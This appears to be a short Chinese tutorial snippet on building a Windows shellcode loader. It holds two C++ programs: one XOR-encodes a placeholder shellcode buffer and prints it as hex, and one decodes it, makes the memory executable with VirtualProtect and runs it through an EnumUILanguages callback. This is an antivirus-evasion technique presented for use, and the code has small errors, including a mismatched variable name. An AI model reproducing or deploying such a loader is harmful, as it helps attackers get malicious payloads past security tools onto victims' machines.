• 异或加密生成加密后的shellcode

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    #include "stdio.h"
    #include <iostream>
    #include "windows.h"
    int main()
    {
        unsigned char buf[] = "shellcodes";
        int nl = sizeof(buf) - 1;
        for (int i = 0; i < nl; i++)
        {
            buf[i] = buf[i] ^ 1022;
            buf[i]++;
            printf("\\x%x", buf[i]);
        }
    }

  • 将加密后的shellcode进行处理,生成exe

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    #include "stdio.h"
    #include <iostream>
    #include "windows.h"
    int main()
    {
        unsigned char buf[] = "加密后的shellcode";
        int nl = sizeof(buf) - 1;
        for (int i = 0; i < nl; i++)
        {
        	buf[i]--;
            buf[i] = buf[i] ^ 1022;
        }
        
     DWORD dw0ldPro = 0;
     BOOL ifExec = VirtualProtect(buf,1024,PAGE_EXECUTE_READWRITE,&dwOldPro);   //设置内存可执行可读写。
    EnumUILanguages((UILANGUAGE_ENUMPROC)&buf,0,0); 
    //回调函数调用shellcode 这里其实就是把shellcode的二进制转成了指针函
        
    }